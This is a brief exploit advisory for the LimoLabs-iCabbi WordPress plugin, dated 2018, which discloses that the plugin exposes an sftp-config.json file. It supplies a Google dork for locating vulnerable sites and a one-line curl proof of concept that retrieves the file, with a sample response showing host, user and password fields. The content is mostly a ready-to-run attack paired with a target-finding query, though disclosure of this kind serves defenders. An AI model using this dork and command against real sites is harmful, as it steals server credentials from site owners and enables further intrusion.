WordPress LimoLabs plugin version 1.0.0 suffers from a remote password disclosure vulnerability.
6281fb867e8d931ad51d1d173ee47895# Exploit Title: Wordpress Plugin LimoLabs-iCabbi Remote Password Disclosure
# Google Dork: inurl:"plugins/limolabs-icabbi"
# Date: 22/07/2018
# Exploit Author: Gabriel Lipski ( gabriel.lipski[AT]protonmail.com )
# Vendor Homepage: https://www.icabbi.com
# Tested on: Ubuntu 12.04.5 / Debian 9.4
* PoC:
$ curl http://<TARGET>/wp-content/plugins/limolabs-icabbi/sftp-config.json
* Response:
...
"host": "1.3.3.7",
"user": "foo",
"password": "bar",
"port": "22",
...